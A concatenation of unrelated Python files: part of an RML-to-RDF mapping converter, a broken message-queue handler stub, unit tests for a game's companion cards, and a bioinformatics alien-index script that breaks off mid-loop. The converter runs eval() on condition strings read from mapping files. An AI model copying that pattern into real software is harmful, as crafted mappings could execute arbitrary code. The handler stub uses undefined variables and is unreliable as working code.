right_ons = []
for join_condition in join_conditions:
left_ons.append(join_condition.get_child().value)
right_ons.append(join_condition.get_parent().value)
df_join = df_left.merge(df_right, how='inner', suffixes=(None, "_r"), left_on=left_ons, right_on=right_ons, sort=False)
pom_representation = df_join.apply(pom.apply_, axis=1)
results = pd.concat([df_join["__pyrml_sbj_representation__"], pom_representation], axis=1, sort=False)
#print("ciccio")
#print(results)
results.columns = ['0_l', '0_r']
else:
pom_representation = None
if isinstance(object_map, ReferencingObjectMap):
pandas_condition = object_map.get_parent_triples_map().get_condition()
if pandas_condition:
df_pom = df[eval(pandas_condition)]
pom_representation = df_pom.apply(pom.apply_, axis=1)
if pom_representation is None:
pom_representation = df.apply(pom.apply_, axis=1)
if pom_representation is not None and not pom_representation.empty:
results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
results.columns = ['0_l', '0_r']
except Exception as e:
raise e
# We remove NaN values so that we can generate valid RDF triples.
results.dropna(inplace=True)
results = results[['0_l', '0_r']].apply(lambda x: (x['0_l'], x['0_r'][0], x['0_r'][1]), axis=1)
for triple in results.values:
try:
g.add(triple)
_classes = self.__subject_map.get_class()
if _classes:
for _class in _classes:
if _class:
g.add((triple[0], RDF.type, _class))
except:
if self._id == URIRef('https://dati.isprambiente.it/ld/rml/sensors_map.ttl#SensorModelData'):
print(triple)
pass
elif self.__subject_map.get_class() is not None:
#triplification = lambda x: TripleMappings.__add_types(x, self.__subject_map.get_class(), g)
#sbj_representation.apply(triplification)
for k,v in sbj_representation.iteritems():
try:
_classes = self.__subject_map.get_class()
if _classes:
for _class in _classes:
if _class:
g.add((v, RDF.type, _class))
except:
pass
elapsed_time_secs = time.time() - start_time
#msg = "\t Triples Mapping %s: %s secs" % (self._id, elapsed_time_secs)
msg = "\t\t done in %s secs" % (elapsed_time_secs)
print(msg)
return g
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
sparql = """
SELECT DISTINCT ?tm ?source ?sm ?pom ?cond
WHERE {
%PLACE_HOLDER%
?tm rml:logicalSource ?source ;
rr:subjectMap ?sm
OPTIONAL {?tm rr:predicateObjectMap ?pom}
OPTIONAL {?tm crml:condition ?cond}
}"""
if parent is not None:
sparql = sparql.replace("%PLACE_HOLDER%", "?p rr:parentTriplesMap ?tm . ")
else:
sparql = sparql.replace("%PLACE_HOLDER%", "")
query = prepareQuery(sparql,
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML,
"crml": rml_vocab.CRML})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
for row in qres:
tm = None
if isinstance(row.tm, URIRef):
if row.tm in mappings_dict:
tm = mappings_dict.get(row.tm)
if tm is not None:
pom = TripleMappings.__build_predicate_object_map(g, row)
poms = tm.get_predicate_object_maps()
if pom is not None and poms is None:
tm.set_predicate_object_maps({ pom.get_id(): pom })
elif pom is not None and pom.get_id() not in poms:
poms.update({ pom.get_id(): pom })
else:
tm = TripleMappings.__build(g, row)
mappings_dict.add(tm)
else:
tm = TripleMappings.__build(g, row)
mappings_dict.add(tm)
if tm is not None:
term_maps.add(tm)
return term_maps
@staticmethod
def __build(g, row):
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
source = None
if row.source is not None:
if isinstance(row.source, URIRef) and row.source in mappings_dict:
source = mappings_dict.get(row.source)
else:
source = LogicalSource.from_rdf(g, row.tm).pop()
mappings_dict.add(source)
subject_map = None
if row.sm is not None:
if isinstance(row.sm, URIRef):
if row.sm in mappings_dict:
subject_map = mappings_dict.get(row.sm)
else:
subject_map = SubjectMap.from_rdf(g, row.tm).pop()
mappings_dict.add(subject_map)
else:
subject_map = SubjectMap.from_rdf(g, row.tm).pop()
predicate_object_map = TripleMappings.__build_predicate_object_map(g, row)
if predicate_object_map is not None:
pom_dict = { predicate_object_map.get_id(): predicate_object_map }
else:
pom_dict = None
return TripleMappings(source, subject_map, pom_dict, row.tm, row.cond)
@staticmethod
def __build_predicate_object_map(g, row):
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
predicate_object_map = None
if row.pom is not None:
if isinstance(row.pom, URIRef):
if row.pom in mappings_dict:
predicate_object_map = mappings_dict.get(row.pom)
else:
predicate_object_map = PredicateObjectMap.from_rdf(g, row.pom).pop()
mappings_dict.add(predicate_object_map)
else:
pom = PredicateObjectMap.from_rdf(g, row.pom)
if len(pom) > 0:
predicate_object_map = pom.pop()
return predicate_object_map
class ReferencingObjectMap(ObjectMap):
def __init__(self, parent_triples_map: TripleMappings, joins: List[Join] = None, map_id: URIRef = None):
super().__init__(map_id, parent_triples_map.get_id())
self.__parent_triples_map = parent_triples_map
self.__joins = joins
def get_parent_triples_map(self) -> TripleMappings:
return self.__parent_triples_map
def get_join_conditions(self) -> List[Join]:
return self.__joins
def to_rdf(self) -> Graph:
g = super().to_rdf()
if self.__child is not None and self.__parent is not None:
g.add((self._id, rml_vocab.PARENT_TRIPLES_MAP, self.__parent_triples_map.get_id()))
return g
def apply(self, df: DataFrame):
#l = lambda x: TermUtils.urify(self.__parent_triples_map.get_subject_map().get_mapped_entity(), x)
if self.__join is not None:
left_on = self.__join.get_child()
right_on = self.__join.get_parent()
ptm = RMLConverter.get_instance().get_mapping_dict().get(self.__parent_triples_map.get_id())
right = ptm.get_logical_source().apply()
df_1 = df.join(right.set_index(right_on.value), how='inner', lsuffix="_l", rsuffix="_r", on=left_on.value, sort=False).rename(columns={left_on.value: right_on.value})
else:
df_1 = df
#df_1 = df_1.apply(l, axis=1)
#df_1 = self.__parent_triples_map.get_subject_map().apply(df_1)
#df_1.replace('', np.nan, inplace=True)
#df_1.dropna(inplace=True)
#return df_1
return self.__parent_triples_map.get_subject_map().apply(df_1)
def apply_(self, row):
out = self.__parent_triples_map.get_subject_map().apply_(row)
#l = lambda x: TermUtils.urify(self.__parent_triples_map.get_subject_map().get_mapped_entity(), x)
'''
if self.__join is not None:
left_on = self.__join.get_child()
right_on = self.__join.get_parent()
ptm = RMLConverter.get_instance().get_mapping_dict().get(self.__parent_triples_map.get_id())
right = ptm.get_logical_source().apply()
right[right[right_on.value] == row[left_on.value]]
#out = row.join(right.set_index(right_on.value), how='inner', lsuffix="_l", rsuffix="_r", on=left_on.value, sort=False).rename(columns={left_on.value: right_on.value})
else:
#out = RMLConverter.get_instance().subject_map_representations[self.__parent_triples_map._id][row.index]
out = self.__parent_triples_map.get_subject_map().apply_(row)
'''
#df_1 = df_1.apply(l, axis=1)
#df_1 = self.__parent_triples_map.get_subject_map().apply(df_1)
#df_1.replace('', np.nan, inplace=True)
#df_1.dropna(inplace=True)
#return df_1
return out
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?parentTriples
WHERE {
?p rr:parentTriplesMap ?parentTriples
}""",
initNs = { "rr": rml_vocab.RR})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
query_join = prepareQuery(
"""
SELECT DISTINCT ?join
WHERE {
?p rr:joinCondition ?join
}""",
initNs = { "rr": rml_vocab.RR})
join_qres = g.query(query_join, initBindings = { "p": row.p})
joins = None
for row_join in join_qres:
if not joins:
joins = []
joins.append(Join.from_rdf(g, row_join.join).pop())
parent_triples = None
if isinstance(row.parentTriples, URIRef):
if row.parentTriples in mappings_dict:
parent_triples = mappings_dict.get(row.parentTriples)
else:
mappings = TripleMappings.from_rdf(g, row.p)
if len(mappings) > 0:
parent_triples = mappings.pop()
mappings_dict.add(parent_triples)
else:
parent_triples = TripleMappings.from_rdf(g, row.p).pop()
if parent_triples is not None:
rmo = ReferencingObjectMap(parent_triples, joins, row.p)
term_maps.add(rmo)
return term_maps
class MappingsDict():
def __init__(self):
self.__dict = dict()
MappingsDict.__instance = self
def __iter__(self):
return self.__dict.__iter__()
def __next__(self):
return self.__dict.__next__()
def add(self, term_map : TermMap):
if isinstance(term_map.get_id(), URIRef):
self.__dict.update( {term_map.get_id(): term_map} )
def get(self, iri : URIRef):
return self.__dict[iri]
class TermUtils():
@staticmethod
def urify(entity, row):
if isinstance(entity, Literal):
s = TermUtils.eval_functions(entity, row, True)
if s is not None and s.strip() != '':
return URIRef(s)
else:
return float('nan')
elif isinstance(entity, URIRef):
return entity
@staticmethod
def replace_place_holders(value, row, is_iri):
#p = re.compile('\{(.+)\/?\}')
p = re.compile('(?<=\{).+?(?=\})')
matches = p.finditer(value)
#input_value = value
s = value
for match in matches:
column = match.group(0)
span = match.span(0)
#span_start = span[0]-2
#span_end = span[1]+1
column_key = column.strip()
if column_key in row:
text = "{( )*" + column + "( )*}"
if row[column_key] != row[column_key]:
s = re.sub(text, '', s)
else:
if column not in row.index:
column += "_l"
cell_value = str(row[column_key])
'''
if span_start>0 and span_end<len(input_value):
if input_value[span_start] == '\'' and input_value[span_end] == '\'':
cell_value = cell_value.replace('\'', '\\\\\'')
elif input_value[span_start] == '"' and input_value[span_end] == '"':
cell_value = cell_value.replace('"', '\\\"')
'''
if is_iri:
value = TermUtils.irify(cell_value)
else:
value = cell_value
s = re.sub(text, value, s)
else:
return None
#print(str(row[column]))
return s
@staticmethod
def __eval_functions(text, row=None):
return EvalParser.parse(text, row)
@staticmethod
def get_functions(text, row=None):
return EvalParser.parse(text, row)
@staticmethod
def __eval_functions_old(text, row):
start = text.find("(")
end = text.rfind(")")
name = text[0:start].strip()
if start > 0:
body = TermUtils.__eval_functions(text[start+1:end].strip(), row)
if RMLConverter.get_instance().has_registerd_function(name):
fun = RMLConverter.get_instance().get_registerd_function(name)
body_parts = body.split(",")
args = []
for body_part in body_parts:
body_part = body_part.strip()
if body_part == "*":
args.append(row)
else:
args.append(body_part)
#if body_part != "*":
# args.append(body_part)
#print("Args", args)
#if body.endswith('*'):
# out = fun(*args, row)
#else:
# out = fun(*args)
out = fun(*args)
else:
out = None
return out
else:
return text
@staticmethod
def eval_functions(value, row, is_iri):
#p = re.compile('\{(.+)\/?\}')
if value is not None:
p = re.compile('(?<=\%eval:).+?(?=\%)')
matches = p.finditer(value)
s = value
for match in matches:
function = match.group(0)
text = "%eval:" + function + "%"
function = TermUtils.replace_place_holders(function, row, False)
result = TermUtils.__eval_functions(function, row)
if result is None:
result = ""
s = s.replace(text, result)
value = TermUtils.replace_place_holders(s, row, is_iri)
return value
@staticmethod
def eval_template(template, row, is_iri):
s = TermUtils.replace_place_holders(template, row, is_iri)
s = eval(repr(s))
#print(s)
return s
@staticmethod
def irify(string):
'''
The followint regex pattern allows to check if the input string is provided as a valid URI. E.g. http://dati.isprambiente.it/rmn/Ancona.jpg
'''
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
'''
In case the input sstring is not a valid URI than the function applies the irification (i.e. the transormation aimed at removing characters that prevent
an IRI to be valid).
'''
if re.match(regex, string) is None:
string = unidecode.unidecode(string)
string = string.lower();
string = re.sub(r'[\']', '', string)
#string = re.sub(r'[;.,&"???!]', '', string)
string = re.sub(r'[;,&"???!]', '', string)
string = re.sub(r'[ \/]', '_', string);
string = re.sub(r'[\(\)]', '', string);
string = re.sub(r'\-$', '', string);
string = re.sub(r'(\-)+', '_', string);
string = re.sub(r'(\_)+', '_', string);
return string
class RMLParser():
def parse(source, format="ttl"):
g = Graph('IOMemory')
g.parse(source, format=format)
return TripleMappings.from_rdf(g)
'''
g_2 = Graph('IOMemory')
for tm in triple_mappings:
g_2 += tm.apply()
g1 = tm.to_rdf()
for l in g1.serialize(format=format).splitlines():
if l: print(l.decode('ascii'))
'''
class RMLConverter():
__instance = None
def __init__(self):
self.__function_registry = dict()
self.__mapping_dict = MappingsDict()
self.__loaded_logical_sources = dict()
self.subject_map_representations = dict()
RMLConverter.__instance = self
@staticmethod
def get_instance():
#if RMLConverter.__instance is None:
# RMLConverter.__instance = RMLConverter()
return RMLConverter.__instance
@staticmethod
def set_instance(instance):
#if RMLConverter.__instance is None:
# RMLConverter.__instance = RMLConverter()
RMLConverter.__instance = instance
def convert(self, rml_mapping, multiprocessed=False, template_vars: Dict[str, str] = None) -> Graph:
plugin.register("sparql", Result, "rdflib.plugins.sparql.processor", "SPARQLResult")
plugin.register("sparql", Processor, "rdflib.plugins.sparql.processor", "SPARQLProcessor")
if template_vars is not None:
if os.path.isabs(rml_mapping):
templates_searchpath = "/"
else:
templates_searchpath = "."
file_loader = FileSystemLoader(templates_searchpath)
env = Environment(loader=file_loader)
template = env.get_template(rml_mapping)
rml_mapping_template = template.render(template_vars)
rml_mapping = StringInputSource(rml_mapping_template.encode('utf-8'))
triple_mappings = RMLParser.parse(rml_mapping)
g = Graph('IOMemory')
if multiprocessed:
processes = multiprocessing.cpu_count()
tms = np.array_split(np.array(list(triple_mappings)), processes)
pool = Pool(initializer=initializer, initargs=(RMLConverter.__instance,), processes=processes)
graphs = pool.map(pool_map, tms)
pool.close()
pool.join()
for graph in graphs:
graph_add_all(g, graph)
else:
print("The RML mapping contains %d triple mappings."%len(triple_mappings))
'''
for tm in triple_mappings:
subject_map_repr = tm.apply_subject_map()
self.subject_map_representations.update({tm._id: subject_map_repr})
for tm in triple_mappings:
triples = tm.apply_()
g = graph_add_all(g, triples)
'''
for tm in triple_mappings:
triples = tm.apply_()
g = graph_add_all(g, triples)
return g
def get_mapping_dict(self):
return self.__mapping_dict
def register_function(self, name, fun):
self.__function_registry.update({name: fun})
def unregister_function(self, name):
del self.__function_registry[name]
def has_registerd_function(self, name):
return name in self.__function_registry
def get_registerd_function(self, name):
return self.__function_registry.get(name)
def get_loaded_logical_sources(self):
return self.__loaded_logical_sources
def initializer(rml_converter):
logger = logging.getLogger("rdflib")
logger.setLevel(logging.ERROR)
logger.disabled = True
RMLConverter.set_instance(rml_converter)
def pool_map(triple_mappings):
g = Graph()
for tm in triple_mappings:
triples = tm.apply()
graph_add_all(g, triples)
return g
#g += tm.apply()
class EvalTransformer(Transformer):
def __init__(self, row=None):
self.__row = row
def start(self, fun):
return fun
#return "%s(%s)"(fun[0],*fun[1])
def f_name(self, name):
rml_converter = RMLConverter.get_instance()
if rml_converter.has_registerd_function(name[0]):
fun = rml_converter.get_registerd_function(name[0])
name[0] = fun.__qualname__
return fun
return None
def parameters(self, parameters):
return parameters
def paramvalue(self, param):
return param[0]
def row(self, val):
return '*'
def string(self, val):
return val[0][1:-1]
def placeholder(self, val):
return val[0]
def number(self, val):
return val[0]
def dec_number(self, val):
return int(val[0])
def hex_number(self, val):
return hex(val[0])
def bin_number(self, val):
return bin(val[0])
def oct_number(self, val):
return oct(val[0])
def float_number(self, val):
return float(val[0])
def imag_number(self, val):
return complex(val[0])
def const_true(self, val):
return True
def const_false(self, val):
return False
def const_none(self, val):
return None
class EvalParser():
dirname = os.path.dirname(__file__)
lark_grammar_file = os.path.join(dirname, 'grammar.lark')
LARK = Lark.open(lark_grammar_file,parser='lalr')
@staticmethod
def parse(expr, row=None):
#logging.debug("Expr", expr)
tree = EvalParser.LARK.parse(expr)
return EvalTransformer(row).transform(tree)
|
#####################################
# Python Imports
#####################################
from quickscmp.bitstream import basic
from sys import path
#####################################
# Manakin Imports
#####################################
path.append('../')
from chaching import fileHandler
#####################################
# Node Queue Handler
#####################################
def handler(client):
'''
(NodeRelay) -> None
This file will be incharge of distributing incoming messages to the proper
whitelist, blacklist or pending text-files for the client
'''
fileHandler(directory)
while True:
if (client.sizeOfQueue() > 0):
bitsream_received = client.deQueue()
parser = basic.Parser(message_received)
request = parser.getRequest()
message_received = parser.getPrimaryData()
message_sender = parser.getSecondaryData()
if (request == '4'):
pass
#check if the sender is on the blacklist
#we will discard the message if they are on it
|
import random
from the_tale.common.utils import testcase
from the_tale.game.logic_storage import LogicStorage
from the_tale.game.logic import create_test_map
from the_tale.game.postponed_tasks import ComplexChangeTask
from the_tale.game.companions import storage as companions_storage
from the_tale.game.companions import logic as companions_logic
from the_tale.game.companions import relations as companions_relations
from the_tale.game.companions.tests import helpers as companions_helpers
from .. import cards
from .. import effects
from . import helpers
class GetCompanionCreateTests(testcase.TestCase):
def setUp(self):
super(GetCompanionCreateTests, self).setUp()
create_test_map()
self.account_1 = self.accounts_factory.create_account()
self.storage = LogicStorage()
self.storage.load_account_data(self.account_1)
self.hero = self.storage.accounts_to_heroes[self.account_1.id]
self.disabled_companion = companions_logic.create_random_companion_record('disbled')
self.manual_companion = companions_logic.create_random_companion_record('manual', mode=companions_relations.MODE.MANUAL)
self.effect = effects.GetCompanion(rarity=companions_relations.RARITY.COMMON)
def test__no_disabled_companions(self):
for i in range(100):
card = self.effect.create_card(type=cards.CARD.GET_COMPANION_COMMON, available_for_auction=True)
self.assertNotEqual(card.data['companion_id'], self.disabled_companion.id)
self.assertTrue(companions_storage.companions[card.data['companion_id']].state.is_ENABLED)
def test__no_manual_companions(self):
for i in range(100):
card = self.effect.create_card(type=cards.CARD.GET_COMPANION_COMMON, available_for_auction=True)
self.assertNotEqual(card.data['companion_id'], self.manual_companion.id)
self.assertTrue(companions_storage.companions[card.data['companion_id']].mode.is_AUTOMATIC)
class GetCompanionMixin(helpers.CardsTestMixin):
CARD = None
def setUp(self):
super(GetCompanionMixin, self).setUp()
create_test_map()
self.account_1 = self.accounts_factory.create_account()
self.storage = LogicStorage()
self.storage.load_account_data(self.account_1)
self.hero = self.storage.accounts_to_heroes[self.account_1.id]
for rarity, rarity_abilities in companions_helpers.RARITIES_ABILITIES.items():
companions_logic.create_random_companion_record('%s companion' % rarity,
mode=companions_relations.MODE.AUTOMATIC,
abilities=rarity_abilities,
state=companions_relations.STATE.ENABLED)
self.card = self.CARD.effect.create_card(type=self.CARD, available_for_auction=True)
def test_use(self):
self.assertEqual(self.hero.companion, None)
result, step, postsave_actions = self.CARD.effect.use(**self.use_attributes(storage=self.storage, hero=self.hero, card=self.card))
self.assertEqual((result, step, postsave_actions), (ComplexChangeTask.RESULT.SUCCESSED, ComplexChangeTask.STEP.SUCCESS, ()))
self.assertEqual(self.hero.companion.record.rarity.card_rarity, self.CARD.rarity)
def test_use__companion_exists(self):
old_companion_record = random.choice([companion
for companion in companions_storage.companions.all()
if companion.rarity.card_rarity != self.CARD.rarity])
self.hero.set_companion(companions_logic.create_companion(old_companion_record))
result, step, postsave_actions = self.CARD.effect.use(**self.use_attributes(storage=self.storage, hero=self.hero, card=self.card))
self.assertEqual((result, step, postsave_actions), (ComplexChangeTask.RESULT.SUCCESSED, ComplexChangeTask.STEP.SUCCESS, ()))
self.assertEqual(self.hero.companion.record.rarity.card_rarity, self.CARD.rarity)
self.assertNotEqual(self.hero.companion.record.id, old_companion_record.id)
def test_available(self):
self.assertTrue(self.CARD.effect.available(self.CARD))
for companion in companions_storage.companions.all():
if companion.rarity.card_rarity == self.CARD.rarity:
companion.state = companions_relations.STATE.DISABLED
self.assertFalse(self.CARD.effect.available(self.CARD))
class GetCompanionCommonTests(GetCompanionMixin, testcase.TestCase):
CARD = cards.CARD.GET_COMPANION_COMMON
class GetCompanionUncommonTests(GetCompanionMixin, testcase.TestCase):
CARD = cards.CARD.GET_COMPANION_UNCOMMON
class GetCompanionRareTests(GetCompanionMixin, testcase.TestCase):
CARD = cards.CARD.GET_COMPANION_RARE
class GetCompanionEpicTests(GetCompanionMixin, testcase.TestCase):
CARD = cards.CARD.GET_COMPANION_EPIC
class GetCompanionLegendaryTests(GetCompanionMixin, testcase.TestCase):
CARD = cards.CARD.GET_COMPANION_LEGENDARY
|
#! /usr/bin/env python
import sys
import numpy as np
import time
usageMsg='''alienIndex.py
Calculate alien index (AI) for a Diamond output file that includes taxonomy info. MUST create using output format 6 command:
--outfmt 6 qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue evalue staxids sskingdoms skingdoms sphylums sscinames
Uses equation AI = (ln(bbhG + 1 * 10e-200)-ln(bbhO + 1 * 10e-200)) from Fan et al. (2020) Science Advances 6: eaba0111
AI ranges from approximately +/- 466, with AI > 0 if evalue higher in ingroup, < 0 if evalue higher in outgroup (So AI > 0 means query is more similar to outgroup than ingroup). Also reports raw numbers and percentage of hits that fell into ingroup/outgroup.'''
helpMsg='''
Required parameters
--ingroup, -i Name of taxonomic ingroup. Can be at any taxonomic level listed below. Set --taxon to search only a particular taxonomic level (use if ingroup name is shared among multiple taxonomic levels)
--file, -f Diamond output file with format specified above
Optional parameters
--outgroup, -g Specify outgroup. If not set, all sequences not in the ingroup are treated as outgroup. Set this if you want to leave a 'gap' between ingroup and outgroup.
--ignore, -n Specify clade within the ingroup to ignore. E.g. Ingroup is Eukaryota, but do not consider hits to Polypodiopsida.
--output, -o Name of output file. If not specified, output is printed to stdout
--missing, -m How to treat N/A taxonomic annotations. Available options: 'ignore' (default), 'outgroup', 'ingroup.
--help, -h Display full usage
--log, -l NOT ACTIVE. File to write log containing warnings generated and offending lines in BLAST file for debugging. Does not affect what is printed to STDOUT.
--taxon, -t Usually not necessary to set. Taxonomic level for ingroup. Available options: 'superkingdom' , 'kingdom', 'phylum', 'genus'
'''
# function to parse dictionary of NCBI taxonomy searching upward until the queryName (or its higher taxonomic level) is found in the outgroupList or ingroupList (or root of all life is reached)
def parseTaxonomy(queryName, outgroupList, ingroupList, ignoregroupList):
currentName = queryName
keyFound = False
ingroupCount = 0
outgroupCount = 0
missingCount = 0
ignoregroupCount = 0
try:
currentNode = firstNodesDict[queryName][0]
currentRank = firstNodesDict[queryName][1]
parentNode = firstNodesDict[queryName][2]
keyFound = True
except KeyError:
keyfound = False
#for key in nodesDict:
# if nodesDict[key][1] == currentName:
# currentNode = key
# currentRank = nodesDict[key][0]
# currentName = nodesDict[key][1]
# parentNode = nodesDict[key][2]
# keyFound = True
# break
if keyFound == False:
currentNode = 1
currentRank = "root"
currentName = "root"
parentNode = 1
warning = "WARNING: %s not found in NCBI taxonomy" % (queryName)
print(warning, file=sys.stderr)
if 'logfile' in globals():
global logfile
logfile.write("WARNING: %s not found in NCBI taxonomy\n" % queryName)
while currentName not in ingroupList and currentName not in outgroupList and currentName not in ignoregroupList:
try:
#print(currentName, currentRank)
currentNode = parentNode
currentRank = nodesDict[parentNode][0]
currentName = nodesDict[parentNode][1]
parentNode = nodesDict[parentNode][2]
if currentNode == 1:
#print("Reached root without finding corrent taxonomic rank" %(currentNode, parentNode))
#currentRank = taxonGrouping
break
elif currentNode != 1 and currentNode == parentNode:
#print("Error: current node and parent node are the same: %s\t%s" %(currentNode, parentNode))
#currentRank = taxonGrouping
break
except KeyError:
break
if currentName in ingroupList:
ingroupCount += 1
elif currentName in outgroupList or len(outgroupList) == 0 and currentNode == 1:
outgroupCount += 1
elif currentName in ignoregroupList:
ignoregroupCount += 1
else:
missingCount += 1
return([queryName, ingroupCount, outgroupCount, ignoregroupCount, missingCount]) # focalTipsPresent probably unecessary and can be removed b/c it can be inferred from 0/1 in other results
# Parse command line and set vars
if "-h" in sys.argv or "--help" in sys.argv:
print(usageMsg)
print(helpMsg)
exit(1)
if "-i" not in sys.argv and "--ingroup" not in sys.argv:
print("ERROR: Ingroup not specified")
print(helpMsg)
exit(1)
if "-f" not in sys.argv and "--file" not in sys.argv:
print("ERROR: BLAST results file not specified")
print(helpMsg)
exit(1)
if "-m" not in sys.argv and "--missing" not in sys.argv:
missingData = "outgroup"
for item in sys.argv:
if "-i" == item or "--ingroup" == item:
ingroup = sys.argv[sys.argv.index(item)+1]
ingroupList = [ingroup]
if "-f" == item or "--file" == item:
infile = sys.argv[sys.argv.index(item)+1]
if item in ["-o", "--output", "--out", "-out"]:
outfile = sys.argv[sys.argv.index(item)+1]
if "-t" == item or "--taxon" == item:
taxonRank = sys.argv[sys.argv.index(item)+1]
if taxonRank not in ['superkingdom' , 'kingdom', 'phylum', 'genus']:
print("ERROR: Not an accepted taxonomic level")
print(helpMsg)
exit(1)
if "-m" == item or "--missing" == item:
missingData = sys.argv[sys.argv.index(item)+1]
if missingData != "outgroup" and missingData != "ingroup" and missingData != "ignore":
print("ERROR: Not an accepted missing data option")
print(helpMsg)
exit(1)
if "-g" == item or "--outgroup" == item:
outgroupList = sys.argv[sys.argv.index(item)+1].split(",")
if "-n" == item or "--ignore" == item:
ignoregroupList = sys.argv[sys.argv.index(item)+1].split(",")
if "-l" == item or "--log" == item:
logfileName = sys.argv[sys.argv.index(item)+1]
logfile = open(logfileName,"w")
if 'outgroupList' not in locals():
outgroupList = []
if 'ignoregroupList' not in locals():
ignoregroupList = []
# Check that ingroup is actually in file - warn against spelling errors. Initiate extensive taxon search if any of the specified ingroup/outgroup/ignoregroup are missing from BLAST file
extensiveTaxonSearch = False
with open(infile) as openInfile:
test_ingroup = []
for line in openInfile:
if 'taxonRank' in locals():
if taxonRank == "superkingdom":
for item in line.strip("\n").split("\t")[13].split(";"):
test_ingroup.append(item)
elif taxonRank == "kingdom":
for item in line.strip("\n").split("\t")[14].split(";"):
test_ingroup.append(item)
elif taxonRank == "phylum":
for item in line.strip("\n").split("\t")[15].split(";"):
test_ingroup.append(item)
elif taxonRank == "genus":
test_ingroup.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
else:
for x in line.strip("\n").split("\t")[13:16]:
test_ingroup.append(x)
test_ingroup.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
for ingroup in ingroupList:
if ingroup.lower() not in [x.lower() for x in set(test_ingroup)]:
extensiveTaxonSearch = True
if 'outgroupList' in locals():
for outgroup in outgroupList:
if outgroup.lower() not in [x.lower() for x in set(test_ingroup)]:
extensiveTaxonSearch = True
if 'ignoregroupList' in locals():
for ignoregroup in ignoregroupList:
if ignoregroup.lower() not in [x.lower() for x in set(test_ingroup)]:
extensiveTaxonSearch = True
if extensiveTaxonSearch == True:
print("WARNING: Ingroup, outgroup, or ignoregroup not found in file. Will perform extensive (slow) taxon search.", file=sys.stderr)
if 'taxonRank' in locals():
print("Options for selected taxonomic level are: %s" % set(test_ingroup), file=sys.stderr)
# Create dictionary of taxonomic heirarchy (only if identifed as needed above)
if extensiveTaxonSearch == True:
nodesDB = "/home/ps997/bin/blobtools/data/nodesDB.txt"
lineCount = 0
nodesDictNamesList = []
nodesDict = {}
with open(nodesDB, "r") as openNodesDB:
for line in openNodesDB:
lineCount += 1
splitline = line.strip("\n").split("\t")
if lineCount > 1:
try:
nodesDict[splitline[0]] = [splitline[1],splitline[2],splitline[3]]
nodesDictNamesList.append(splitline[2])
except:
print("ERROR on line %s of %s: Incorrectly formatted, must have 4 tab-separated columns" %(lineCount, nodesDB))
exit(1)
firstNodesDict = {}
lineCount = 0
with open(nodesDB, "r") as openNodesDB:
for line in openNodesDB:
lineCount += 1
splitline = line.strip("\n").split("\t")
if lineCount > 1:
try:
firstNodesDict[splitline[2]] = [splitline[0],splitline[1],splitline[3]]
except:
print("ERROR on line %s of %s: Incorrectly formatted, must have 4 tab-separated columns" %(lineCount, nodesDB))
exit(1)
####### Run #######
# Parse BLAST result file. In each line, use taxonomy info in columns 13,14,15,16 to determine if line is member of ingroup, outgroup, or neither.
# Creates dictionary with lowest evalue for ingroup and outgroup, and numbers of hits in ingroup and outgroup for each query sequence.
mainDict = {} # Structure: { qseqid1 : {"bestBlastHitIngroup" = line}, {"bestBlastHitOutgroup" = line}, {"AI" : NUM} }, {"numIngroup" : int}, {"numOutgroup" = int} } ; qseqid2...}
totalLines = 0
with open(infile, 'r') as openInfile:
for line in openInfile:
totalLines += 1
lineCount = 0
startTime = time.time()
with open(infile, 'r') as openInfile:
for line in openInfile:
lineCount += 1
percDone = float(lineCount/totalLines*100)
currentTime = time.time()
runTime = currentTime - startTime
linesPerSec = lineCount/runTime
sys.stderr.write("\r")
sys.stderr.write("Percent Complete: %0.2f\t\tAvg. speed: %0.2f lines/sec" % (percDone, linesPerSec))
sys.stderr.flush()
qseqid = line.split("\t")[0]
evalue = line.split("\t")[10]
try: # needed to skip reassigning 0 to counts after first instance of qseqid
mainDict[qseqid]["numIngroup"]
except KeyError:
mainDict[qseqid] = {"numIngroup" : float(0)}
mainDict[qseqid].update({"numOutgroup" : float(0)})
# subsection if extensive taxon search needed
if extensiveTaxonSearch == True:
# Start search with genus from BLAST line
staxon = [line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0]]
# Exception to handle Candidatus names because they have a space
if "Candidatus" in staxon:
staxon = [" ".join(line.strip("\n").split("\t")[16].split(" ")[0:2])]
try:
staxon.remove("0")
except:
pass
uniqstaxon = list(filter(None, [y for y in set(staxon)]))
try:
uniqstaxon.remove("0")
except:
pass
ingroupFound = False
outgroupFound = False
ignoregroupFound = False
missingGroup = False
# If an invalid genus name found, try the phylum instead
#if uniqstaxon[0] not in nodesDictNamesList:
#if uniqstaxon[0] == "N/A" or uniqstaxon[0] == "synthetic" or uniqstaxon[0] == "unclassified":
# staxon = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
# try:
# staxon.remove("0")
# except:
# pass
# uniqstaxon = list(filter(None, [y for y in set(staxon)]))
# try:
# uniqstaxon.remove("0")
# except:
# pass
# As long as taxon name is not N/A, try parse taxonomy to find the name to determine if ingroup, outgroup, or ignored
if uniqstaxon[0] != "N/A":
for taxon in uniqstaxon:
# parseTaxonomy expects lists for ingroup, outgroup so have to create them. Should probably be removed and just use strings for this script.
if taxon in nodesDictNamesList:
